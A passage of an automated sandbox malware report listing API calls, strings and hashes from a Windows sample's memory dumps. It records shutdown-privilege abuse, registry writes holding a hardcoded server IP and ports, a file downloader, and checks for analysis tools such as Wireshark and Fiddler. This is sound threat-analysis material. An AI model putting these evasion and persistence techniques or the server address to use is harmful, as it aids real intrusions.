                                                                                                                                                                        • Part of subcall function 03777B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03777BCC
                                                                                                                                                                        • Part of subcall function 03777B70: GetLastError.KERNEL32 ref: 03777BD2
                                                                                                                                                                        • Part of subcall function 03777B70: CloseHandle.KERNEL32(?), ref: 03777BE0
                                                                                                                                                                      • ExitWindowsEx.USER32(00000006,00000000), ref: 0377B44D
                                                                                                                                                                        • Part of subcall function 03777B70: CloseHandle.KERNEL32(?), ref: 03777BFB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 681424410-0
                                                                                                                                                                      • Opcode ID: 901c3ef616afa3f28729a67b61c80e08e67d712a93d9d7da0e9eb4db4466cc8e
                                                                                                                                                                      • Instruction ID: db3a6a3a2a73fa220df6629f08090f00262a33086b1c5c36d0eb0b5bee5f046f
                                                                                                                                                                      • Opcode Fuzzy Hash: 901c3ef616afa3f28729a67b61c80e08e67d712a93d9d7da0e9eb4db4466cc8e
                                                                                                                                                                      • Instruction Fuzzy Hash: C5C08C3634020412D618B3B87C2EB7AB340DB88322F00452BE60A8C0D18C5784A145E6
                                                                                                                                                                      Function 0377B41B Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 03777B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03777B89
                                                                                                                                                                        • Part of subcall function 03777B70: OpenProcessToken.ADVAPI32(00000000), ref: 03777B90
                                                                                                                                                                        • Part of subcall function 03777B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03777BB6
                                                                                                                                                                        • Part of subcall function 03777B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03777BCC
                                                                                                                                                                        • Part of subcall function 03777B70: GetLastError.KERNEL32 ref: 03777BD2
                                                                                                                                                                        • Part of subcall function 03777B70: CloseHandle.KERNEL32(?), ref: 03777BE0
                                                                                                                                                                      • ExitWindowsEx.USER32(00000004,00000000), ref: 0377B429
                                                                                                                                                                        • Part of subcall function 03777B70: CloseHandle.KERNEL32(?), ref: 03777BFB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 681424410-0
                                                                                                                                                                      • Opcode ID: 8a1a548d52ad7dced3dbdc1d1dc34dbf0d487053550658a129de9495a1c6c1a9
                                                                                                                                                                      • Instruction ID: 9959559b6afb637615263198a474ff23d96fec0ae4d4e33aa2b22a1cf41b9932
                                                                                                                                                                      • Opcode Fuzzy Hash: 8a1a548d52ad7dced3dbdc1d1dc34dbf0d487053550658a129de9495a1c6c1a9
                                                                                                                                                                      • Instruction Fuzzy Hash: 8DC04C3634024416D618B7B97C6EB79B340DB98722F50456BE70A9C0D18C66949545EA
                                                                                                                                                                      Function 0377B556 Relevance: 43.9, APIs: 8, Strings: 17, Instructions: 161registrysleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0377F707: _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 0377B586
                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(?,IpDate), ref: 0377B596
                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 0377B5B3
                                                                                                                                                                      • _memset.LIBCMT ref: 0377B5D4
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0377B61B
                                                                                                                                                                      • _memset.LIBCMT ref: 0377B63C
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0377B72C
                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 0377B737
                                                                                                                                                                        • Part of subcall function 0377F707: std::exception::exception.LIBCMT ref: 0377F756
                                                                                                                                                                        • Part of subcall function 0377F707: std::exception::exception.LIBCMT ref: 0377F770
                                                                                                                                                                        • Part of subcall function 0377F707: __CxxThrowException@8.LIBCMT ref: 0377F781
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseValue_memsetstd::exception::exception$DeleteException@8OpenSleepThrow_malloc
                                                                                                                                                                      • String ID: 118.107.44.219$118.107.44.219$118.107.44.219$19091$19092$19093$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
                                                                                                                                                                      • API String ID: 1186799303-3661167401
                                                                                                                                                                      • Opcode ID: 5531413aeae9a851b6756a0bcc75efd462d4d1cf4731d0de38d71324db315eec
                                                                                                                                                                      • Instruction ID: 6ef290c30e1052fdcefdaae42af36c399f37ec2e0efeae7b3810f8deb8436417
                                                                                                                                                                      • Opcode Fuzzy Hash: 5531413aeae9a851b6756a0bcc75efd462d4d1cf4731d0de38d71324db315eec
                                                                                                                                                                      • Instruction Fuzzy Hash: E241D3B57803147FFA11FB10EC4BF6E7358AF45B20F144256FA146E283E6A4A51582EB
                                                                                                                                                                      Function 03784014 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03780FC1,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 0378401C
                                                                                                                                                                      • __mtterm.LIBCMT ref: 03784028
                                                                                                                                                                        • Part of subcall function 03783CF1: DecodePointer.KERNEL32(00000009,03781084,0378106A,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03783D02
                                                                                                                                                                        • Part of subcall function 03783CF1: TlsFree.KERNEL32(00000027,03781084,0378106A,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03783D1C
                                                                                                                                                                        • Part of subcall function 03783CF1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,03781084,0378106A,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03788D48
                                                                                                                                                                        • Part of subcall function 03783CF1: _free.LIBCMT ref: 03788D4B
                                                                                                                                                                        • Part of subcall function 03783CF1: DeleteCriticalSection.KERNEL32(00000027,?,?,03781084,0378106A,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03788D72
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0378403E
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0378404B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 03784058
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 03784065
                                                                                                                                                                      • TlsAlloc.KERNEL32(?,?,03780FC1,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 037840B5
                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,03780FC1,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 037840D0
                                                                                                                                                                      • __init_pointers.LIBCMT ref: 037840DA
                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,03780FC1,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 037840EB
                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,03780FC1,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 037840F8
                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,03780FC1,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03784105
                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,03780FC1,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03784112
                                                                                                                                                                      • DecodePointer.KERNEL32(Function_00013E75,?,?,03780FC1,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03784133
                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 03784148
                                                                                                                                                                      • DecodePointer.KERNEL32(00000000,?,?,03780FC1,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03784162
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 03784174
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                      • API String ID: 3698121176-3819984048
                                                                                                                                                                      • Opcode ID: 272c365a80d22202efe1d95ec99e917c7a2320396913a8c45e4a128dae65db76
                                                                                                                                                                      • Instruction ID: 63724a097524fc1ed377abd9a9bf80667873d0f33ee0690d6326681bdd83ead5
                                                                                                                                                                      • Opcode Fuzzy Hash: 272c365a80d22202efe1d95ec99e917c7a2320396913a8c45e4a128dae65db76
                                                                                                                                                                      • Instruction Fuzzy Hash: 773162B5D80B05AEEB50FF76A80CD197FA4EB85761B148E1BE810C6298EB788045EF41
                                                                                                                                                                      Function 02C69AC6 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,02C675E2,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69ACE
                                                                                                                                                                      • __mtterm.LIBCMT ref: 02C69ADA
                                                                                                                                                                        • Part of subcall function 02C697A5: DecodePointer.KERNEL32(00000008,02C676A5,02C6768B,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C697B6
                                                                                                                                                                        • Part of subcall function 02C697A5: TlsFree.KERNEL32(00000025,02C676A5,02C6768B,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C697D0
                                                                                                                                                                        • Part of subcall function 02C697A5: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,02C676A5,02C6768B,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C6C031
                                                                                                                                                                        • Part of subcall function 02C697A5: _free.LIBCMT ref: 02C6C034
                                                                                                                                                                        • Part of subcall function 02C697A5: DeleteCriticalSection.KERNEL32(00000025,?,?,02C676A5,02C6768B,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C6C05B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C69AF0
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02C69AFD
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02C69B0A
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02C69B17
                                                                                                                                                                      • TlsAlloc.KERNEL32(?,?,02C675E2,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69B67
                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,02C675E2,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69B82
                                                                                                                                                                      • __init_pointers.LIBCMT ref: 02C69B8C
                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,02C675E2,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69B9D
                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,02C675E2,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69BAA
                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,02C675E2,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69BB7
                                                                                                                                                                      • EncodePointer.KERNEL32(?,?,02C675E2,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69BC4
                                                                                                                                                                      • DecodePointer.KERNEL32(Function_00009929,?,?,02C675E2,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69BE5
                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 02C69BFA
                                                                                                                                                                      • DecodePointer.KERNEL32(00000000,?,?,02C675E2,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69C14
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C69C26
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                      • API String ID: 3698121176-3819984048
                                                                                                                                                                      • Opcode ID: c52037f637509d339aa07cd3ff56188ed7a93583103aa68f38b1787f95d13407
                                                                                                                                                                      • Instruction ID: 200884a282290d32d2f69ed906660bd87c7c755cf3ab0c889d9ce5ebc3502cda
                                                                                                                                                                      • Opcode Fuzzy Hash: c52037f637509d339aa07cd3ff56188ed7a93583103aa68f38b1787f95d13407
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E316231DC0215AFD7606F74AC8C72ABBA5AB85768F540F26D824D3150DB358869EF50
                                                                                                                                                                      Function 0377C3A0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 170stringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$_wcsrchrlstrcat$EnvironmentExpandStringslstrlenwsprintf
                                                                                                                                                                      • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                                                                                                                                                      • API String ID: 3970221696-33419044
                                                                                                                                                                      • Opcode ID: 2dbd685e3db53d0386f0b7fce5f946f19ee7d95a85978790614de4e6e1bb0292
                                                                                                                                                                      • Instruction ID: 296d60d030f63cccce03e8a94fdb99f5f2d63bda0e97056e50bbfa5537015526
                                                                                                                                                                      • Opcode Fuzzy Hash: 2dbd685e3db53d0386f0b7fce5f946f19ee7d95a85978790614de4e6e1bb0292
                                                                                                                                                                      • Instruction Fuzzy Hash: 11510BB1A8031D76DF21F760DC49FEE77789F18700F004599EB09AA080EB759688CBA6
                                                                                                                                                                      Function 03777C80 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 141libraryloaderfileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryW.KERNEL32(wininet.dll), ref: 03777CC3
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03777CD7
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 03777CF7
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 03777D16
                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 03777D53
                                                                                                                                                                      • _memset.LIBCMT ref: 03777D7E
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 03777D8C
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03777DDB
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03777DF9
                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 03777E01
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 03777E0D
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 03777E28
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
                                                                                                                                                                      • String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
                                                                                                                                                                      • API String ID: 1463273941-1099148085
                                                                                                                                                                      • Opcode ID: 943adeae44317c264f406375dd3755623ce23690f89eb17f11558405b05cc2f3
                                                                                                                                                                      • Instruction ID: 0f18c801868077edeadce18b9aaa344d5d920f2dbe88b94ede3da9cb356a8666
                                                                                                                                                                      • Opcode Fuzzy Hash: 943adeae44317c264f406375dd3755623ce23690f89eb17f11558405b05cc2f3
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E41B971A4022CABDB24EB649C45FEEB3F8FF44700F14C5D9E644A6181DE745A468FD4
                                                                                                                                                                      Function 03774530 Relevance: 27.2, APIs: 18, Instructions: 247threadnetworksleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0377455A
                                                                                                                                                                      • timeGetTime.WINMM ref: 0377457B
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0377459B
                                                                                                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 037745BD
                                                                                                                                                                      • SwitchToThread.KERNEL32 ref: 037745D7
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 03774620
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03774644
                                                                                                                                                                      • send.WS2_32(?,037949C0,00000010,00000000), ref: 03774668
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 03774686
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 03774691
                                                                                                                                                                      • WSACloseEvent.WS2_32(?), ref: 0377469F
                                                                                                                                                                      • shutdown.WS2_32(?,00000001), ref: 037746B3
                                                                                                                                                                      • closesocket.WS2_32(?), ref: 037746BD
                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 037746F6
                                                                                                                                                                      • SetLastError.KERNEL32(000005B4), ref: 0377470A
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0377472B
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 03774743
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1692523546-0
                                                                                                                                                                      • Opcode ID: 53707ec190d45f1388a87b06851ba7b4a4df0cbf8f6b3fa18f06454e56d1488e
                                                                                                                                                                      • Instruction ID: 68b15f8ce4cd3e0ce3fc29f7ea784f78f45ff918debd4465f8c3b21659cb7d05
                                                                                                                                                                      • Opcode Fuzzy Hash: 53707ec190d45f1388a87b06851ba7b4a4df0cbf8f6b3fa18f06454e56d1488e
                                                                                                                                                                      • Instruction Fuzzy Hash: 7891AC74200716EBCB24EF26D888BAAF7A9FF48705F148629E516CB645C735F891CBD0
                                                                                                                                                                      Function 0377A6F0 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 254COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$swprintf$_malloc
                                                                                                                                                                      • String ID: %s %s$onlyloadinmyself$plugmark
                                                                                                                                                                      • API String ID: 1873853019-591889663
                                                                                                                                                                      • Opcode ID: b576ad3f864d768b2298ff5b89c46459b0d70e0ad4e67acc6d9db015cb8cd704
                                                                                                                                                                      • Instruction ID: a7d5a396f52b5e18ed62feda74934973fc3f4dc2353a442cbb77e89af2c5e587
                                                                                                                                                                      • Opcode Fuzzy Hash: b576ad3f864d768b2298ff5b89c46459b0d70e0ad4e67acc6d9db015cb8cd704
                                                                                                                                                                      • Instruction Fuzzy Hash: F98194B5A40300ABFB10EF24DC8AF6B77A4AF45710F194169ED195F383E671E91187E2
                                                                                                                                                                      Function 03775CC0 Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 164windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 03775CD3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: VisibleWindow
                                                                                                                                                                      • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                                                                                                                                                                      • API String ID: 1208467747-3439171801
                                                                                                                                                                      • Opcode ID: 06e85be644a968c945f107108c1411a139fa1d78e23dfd32fc153077bed7aa78
                                                                                                                                                                      • Instruction ID: a15e3967690bec76464b64a12cc79372e4fdabf9465e42d2f3bbb6bb088a28b8
                                                                                                                                                                      • Opcode Fuzzy Hash: 06e85be644a968c945f107108c1411a139fa1d78e23dfd32fc153077bed7aa78
                                                                                                                                                                      • Instruction Fuzzy Hash: 784124F6E91B657AEE62F7317D06FAF214C0D235BAF080166EC18EC105F689921941FE
                                                                                                                                                                      Function 02C64530 Relevance: 24.2, APIs: 16, Instructions: 180threadnetworksleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 02C6455A
                                                                                                                                                                      • timeGetTime.WINMM ref: 02C6457B
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C6459B
                                                                                                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C645BD
                                                                                                                                                                      • SwitchToThread.KERNEL32 ref: 02C645D7
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 02C64620
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 02C64644
                                                                                                                                                                      • send.WS2_32(?,02C77440,00000010,00000000), ref: 02C64668
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 02C64686
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02C64691
                                                                                                                                                                      • WSACloseEvent.WS2_32(?), ref: 02C6469F
                                                                                                                                                                      • shutdown.WS2_32(?,00000001), ref: 02C646B3
                                                                                                                                                                      • closesocket.WS2_32(?), ref: 02C646BD
                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 02C646F6
                                                                                                                                                                      • SetLastError.KERNEL32(000005B4), ref: 02C6470A
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C7FA44
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EventThread$CloseCurrentErrorExchangeInterlockedLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3448239111-0
                                                                                                                                                                      • Opcode ID: 63e0d30c84d33aba5debb0641fc947cdd55c64083497316c40577f980ced6887
                                                                                                                                                                      • Instruction ID: c06b98738fe6ee3ebef64bd1fb84b385cad3fce75315d6ec88ef6405c69ec9ab
                                                                                                                                                                      • Opcode Fuzzy Hash: 63e0d30c84d33aba5debb0641fc947cdd55c64083497316c40577f980ced6887
                                                                                                                                                                      • Instruction Fuzzy Hash: DF51CE71A40616ABC738DF64D8CCBB9B7A5FF84745F404625E90587A80C770E6A5CBD0
